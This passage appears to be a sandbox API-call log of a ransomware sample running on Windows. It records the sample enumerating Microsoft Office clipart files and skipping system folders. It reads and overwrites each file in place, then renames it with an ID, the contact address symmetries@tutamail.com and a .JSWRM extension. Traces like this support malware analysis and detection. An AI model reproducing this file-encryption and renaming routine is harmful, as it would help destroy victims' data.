dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0077.004] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc55757, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc55757, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x920e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00096_.WMF", cAlternateFileName="")) returned 1 [0077.004] lstrcmpiW (lpString1="FD00096_.WMF", lpString2=".") returned 1 [0077.004] lstrcmpiW (lpString1="FD00096_.WMF", lpString2="..") returned 1 [0077.004] lstrcmpiW (lpString1="FD00096_.WMF", lpString2="...") returned 1 [0077.004] lstrcmpiW (lpString1="FD00096_.WMF", lpString2="windows") returned -1 [0077.004] lstrcmpiW (lpString1="FD00096_.WMF", lpString2="recovery") returned -1 [0077.004] lstrcmpiW (lpString1="FD00096_.WMF", lpString2="perflogs") returned -1 [0077.004] lstrcmpiW (lpString1="FD00096_.WMF", lpString2="documents and settings") returned 1 [0077.004] lstrcmpiW (lpString1="FD00096_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.004] lstrcmpiW (lpString1="FD00096_.WMF", lpString2="system volume information") returned -1 [0077.004] lstrcmpiW (lpString1="FD00096_.WMF", lpString2="msocache") returned -1 [0077.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0077.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00096_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00096_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00096_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0077.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0077.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00096_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00096_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00096_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0077.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0077.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0077.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0077.005] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00096_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.006] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=37390) returned 1 [0077.006] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9200) returned 0x24d210 [0077.006] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9200, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9200, lpOverlapped=0x0) returned 1 [0077.137] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.137] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9200, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9200, lpOverlapped=0x0) returned 1 [0077.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.138] CloseHandle (hObject=0x314) returned 1 [0077.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0077.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0077.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0077.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0077.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0077.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0077.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0077.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0077.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0077.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0077.139] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00096_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00096_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0077.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0077.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0077.140] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc55757, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc55757, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3df0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00296_.WMF", cAlternateFileName="")) returned 1 [0077.140] lstrcmpiW (lpString1="FD00296_.WMF", lpString2=".") returned 1 [0077.140] lstrcmpiW (lpString1="FD00296_.WMF", lpString2="..") returned 1 [0077.140] lstrcmpiW (lpString1="FD00296_.WMF", lpString2="...") returned 1 [0077.140] lstrcmpiW (lpString1="FD00296_.WMF", lpString2="windows") returned -1 [0077.140] lstrcmpiW (lpString1="FD00296_.WMF", lpString2="recovery") returned -1 [0077.140] lstrcmpiW (lpString1="FD00296_.WMF", lpString2="perflogs") returned -1 [0077.140] lstrcmpiW (lpString1="FD00296_.WMF", lpString2="documents and settings") returned 1 [0077.140] lstrcmpiW (lpString1="FD00296_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.140] lstrcmpiW (lpString1="FD00296_.WMF", lpString2="system volume information") returned -1 [0077.140] lstrcmpiW (lpString1="FD00296_.WMF", lpString2="msocache") returned -1 [0077.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0077.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00296_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00296_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00296_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0077.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0077.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00296_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00296_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00296_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0077.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0077.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0077.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0077.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.141] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15856) returned 1 [0077.141] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3df0) returned 0x24d210 [0077.142] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3df0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3df0, lpOverlapped=0x0) returned 1 [0077.144] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.144] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3df0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3df0, lpOverlapped=0x0) returned 1 [0077.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.145] CloseHandle (hObject=0x314) returned 1 [0077.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0077.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0077.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0077.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0077.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0077.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0077.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0077.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0077.145] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00296_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00296_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0077.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0077.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0077.154] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc7b993, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4712, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00297_.WMF", cAlternateFileName="")) returned 1 [0077.154] lstrcmpiW (lpString1="FD00297_.WMF", lpString2=".") returned 1 [0077.154] lstrcmpiW (lpString1="FD00297_.WMF", lpString2="..") returned 1 [0077.154] lstrcmpiW (lpString1="FD00297_.WMF", lpString2="...") returned 1 [0077.154] lstrcmpiW (lpString1="FD00297_.WMF", lpString2="windows") returned -1 [0077.154] lstrcmpiW (lpString1="FD00297_.WMF", lpString2="recovery") returned -1 [0077.154] lstrcmpiW (lpString1="FD00297_.WMF", lpString2="perflogs") returned -1 [0077.154] lstrcmpiW (lpString1="FD00297_.WMF", lpString2="documents and settings") returned 1 [0077.154] lstrcmpiW (lpString1="FD00297_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.154] lstrcmpiW (lpString1="FD00297_.WMF", lpString2="system volume information") returned -1 [0077.154] lstrcmpiW (lpString1="FD00297_.WMF", lpString2="msocache") returned -1 [0077.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0077.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00297_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00297_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00297_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0077.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0077.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00297_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00297_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00297_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0077.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0077.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0077.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0077.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00297_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.155] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18194) returned 1 [0077.155] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4710) returned 0x24d210 [0077.155] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4710, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4710, lpOverlapped=0x0) returned 1 [0077.157] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.157] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4710, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4710, lpOverlapped=0x0) returned 1 [0077.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.157] CloseHandle (hObject=0x314) returned 1 [0077.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0077.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0077.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0077.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0077.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0077.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0077.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0077.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0077.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.158] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00297_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00297_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0077.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0077.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0077.158] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb6de, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00306_.WMF", cAlternateFileName="")) returned 1 [0077.158] lstrcmpiW (lpString1="FD00306_.WMF", lpString2=".") returned 1 [0077.158] lstrcmpiW (lpString1="FD00306_.WMF", lpString2="..") returned 1 [0077.159] lstrcmpiW (lpString1="FD00306_.WMF", lpString2="...") returned 1 [0077.159] lstrcmpiW (lpString1="FD00306_.WMF", lpString2="windows") returned -1 [0077.159] lstrcmpiW (lpString1="FD00306_.WMF", lpString2="recovery") returned -1 [0077.159] lstrcmpiW (lpString1="FD00306_.WMF", lpString2="perflogs") returned -1 [0077.159] lstrcmpiW (lpString1="FD00306_.WMF", lpString2="documents and settings") returned 1 [0077.159] lstrcmpiW (lpString1="FD00306_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.159] lstrcmpiW (lpString1="FD00306_.WMF", lpString2="system volume information") returned -1 [0077.159] lstrcmpiW (lpString1="FD00306_.WMF", lpString2="msocache") returned -1 [0077.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0077.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00306_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00306_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00306_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 